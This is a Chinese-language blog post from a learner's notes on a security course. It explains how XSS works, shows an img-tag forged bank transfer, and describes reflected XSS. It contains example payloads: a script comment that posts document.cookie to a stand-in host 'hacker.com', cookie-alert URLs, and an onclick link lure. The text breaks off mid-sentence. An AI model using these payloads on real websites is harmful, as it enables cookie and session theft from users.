XSS 的分类与利用方式

发表于 2021-09-05 更新于 2024-09-17 分类于 Security Waline：

XSS（跨站脚本攻击，注意是跨站，不是跨域，二者的区别大家可以自行搜索）漏洞已经是一个老生常谈的前端安全威胁了。

但是其实到目前为止还是高居前端漏洞排行榜前十。

加上最近买了门关于网络安全漏洞大全的课程，当然主要目的还是保护自己的信息安全，哈哈哈。

课程大概分为五个部分，第一个部分是安全基础，都是些基础知识，比如HTML，CSS，JS，PHP，NGINX，Spring，网络协议等等，其实就是经典面试题，从你输入一个链接到收到网页会发生什么，这个问题，是一个极好的问题，甚至可以说是整个互联网所有技术的主干，你所有的知识，几乎都可以挂到真个问题上。

第二部分是后端安全，小部分是讲了文件上传漏洞，或者一些Nginx的漏洞，大部分讲的是SQL注入，这部分，看了一点我就觉得自己应该重新回去看数据库再回来看，因为基本看不懂。

所以直接跳到了第三部分的前端安全，上来就是这个XSS，又刷新了自己的一波认知，记录下。

XSS攻击的危害

在讲三种常见XSS之前，还是废话一下XSS攻击的基本原理。

大家都知道，我们看到的网页其实都是HTML，也就是我们小学计算机课就会听到的一个词，叫做“超文本标记语言”，它是用一个个的标签来表示自己想要呈现的内容，然后浏览器根据语言的设计标准，去将这些标签转化为图片，是的，没错，其实无论是什么软件，最后都是被绘制成了图片展现给用户的，网页和普通的软件并没有什么本质上的不同，对于计算机来说，最后一步都是给画成图片。

1 2	<div>这是一个div</div> <img src="图片地址链接"/>

这是一段非常简单的html，实际的页面比这个复杂很多，大家可以随便打开一个网页，用开发者工具看看。

标签有很多种，有的标签是会发送请求或者执行代码的。

比如img标签，src属性其实就是发送了个请求，去获取src属性所指的服务器图片，当然，如果是个正常的网站，获取了图片之后，就会渲染成正常的图片，但如果这个src不是一个正常的图片地址，而是一个转账请求呢？比如以下这种

1	<img src="https://www.somebank/transformer/from/A/to/B/dollar/10000"/>

假设某个银行的转账请求就是这个https://www.somebank/transformer/from/A/to/B/dollar/1000，这个请求正常来讲，就是你在银行的官网选择从你的账户（A）给B转账才会发出的，一般是点一个按钮（html: ，这个东西渲染出来就是我们平时看到的按钮，可以看出来，本质上button和img都是一个标签而已）。

但如果不正常，你打开了一个网页，一个来历不明的网页，里面就是有这个图片，浏览器渲染这个img的时候，就会尝试去src的地址获取图片，但很不幸，这个地址并没有一个图片，你发送了一个转账请求，银行服务器只会告诉你，转账成功，那么没拿回图片来，这个图片本该出现的位置，可能就是一个简单的叉号，而你的钱已经没了。

img还算简单，只能发送get请求，如果是script标签，就是我们平时所说的js脚本存放的地方，如果给攻击者注入了脚本，那真就可以为所欲为了，你所有的信息都会被拿走，比如cookie（也就是你在某个网站的信息，拿到这个，就相当于你在该网站的所有权限都对黑客开放了，拿到这个，只需要简单的document.cookie就可以，只需要这几个字母，你的身份就被窃取了）。

XSS的基本攻击原理

上面讲了XSS的危害，那么讲讲基本原理，我们就以危害最大的script来举例，其实我们想办法给一个网站注入一个script标签。

这件事请其实也不难，我们刚才说过，所有的都是标签，一个正常的网页，比如论坛，很多人都可以在上面发表自己的言论，比如我我在一个帖子下面发表，“今天天气真好”，网页想要渲染，其实就是先把这句话转为了<span>今天天气真好</span>;

但是如果我发表的评论是<script>post('http://hacker.com/cookie', document.cookie)</script>；如果这个论坛做的不够安全，大家以为，这个东西会像正常的评论显示给你看吗？

并不会的，这东西会被渲染成script标签，而其中的代码（post('http://hacker.com/cookie', document.cookie)）会被执行，你的cookie就会被发送到攻击者的服务器。

当然，发展到现在，很少有网站还有这种很基础的漏洞了，这个事情本来就是，黑客找到网站安全的绕过方式。

而最终目的，就是让自己的内容不是被认为是一段文本单纯的展示。

反射型XSS

这类的XSS比较基础，危害也比较小，它叫做反射型是因为，这个链接到了后端之后，后端解析完成，直接就返回给前端了，就像一次反射一样，并没有对后端产生影响。

它需要黑客构造一段url，然后诱惑用户去点击。

假设有个网站，当你登录成功之后，

他会跳转到一个新的地址，如http://localhost/xss_get.php?firstname=ray&lastname=sun

然后这个网站会从url里面这个固定位置，拿出这个ray 和 sun来渲染到页面。

这个看起来没问题，但如果，你输入了一段脚本，http://site.com/user/<script>alert(document.cookie)</script>

这个时候，浏览器的表现就是这样：

如果我不是alert，而是发请求到后台，那么cookie就会被我窃取。

那么怎么防御呢？最基本的就是奇怪的url不要点，但是还是天真了。

第一种方式，有的网页会提示你让你抽奖，你点了以后，就等于点了这个链接，如

1	<img onclick="window.location.href=http://localhost/xss_get.php?firstname=ray&lastname=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&form=submit" src="这里确实是个图片地址"/>

你点了这个图片，就会出发onclick对应的代码，然后就会修改window.locaion.href，这东西改了，浏览器就会跳转。

第二种方式，短链或者二维码：

比如上面那个链接，去985.so，就会帮你转成这个：